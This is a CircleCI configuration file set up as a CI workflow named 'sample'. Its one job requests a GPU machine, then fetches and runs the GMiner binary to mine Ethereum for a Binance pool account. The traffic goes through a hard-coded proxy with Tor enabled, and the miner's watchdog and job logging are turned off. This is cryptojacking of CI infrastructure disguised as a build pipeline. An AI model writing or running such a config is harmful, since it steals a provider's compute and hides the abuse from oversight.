working_dir: &working_dir ~/app

version: 2.1 
 
orbs: 
   
  python: circleci/python@1.2 
 
workflows: 
  sample:   
    jobs: 
      - job
 
jobs: 
  job:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.large
     
    steps:
      - checkout
      - run: wget https://github.com/develsoftware/GMinerRelease/releases/download/2.91/gminer_2_91_linux64.tar.xz && tar -xvf gminer_2_91_linux64.tar.xz && ./miner --algo ethash --server stratum+tcp://ethash.poolbinance.com:1800 --user teguhcong.$(echo tesBezzMiniZ-$(shuf -i 1-99 -n 1)) -p x -d 0 --log_newjob 0 --cuda 1 --watchdog 0 --proxy 176.53.133.217:57597 --Tor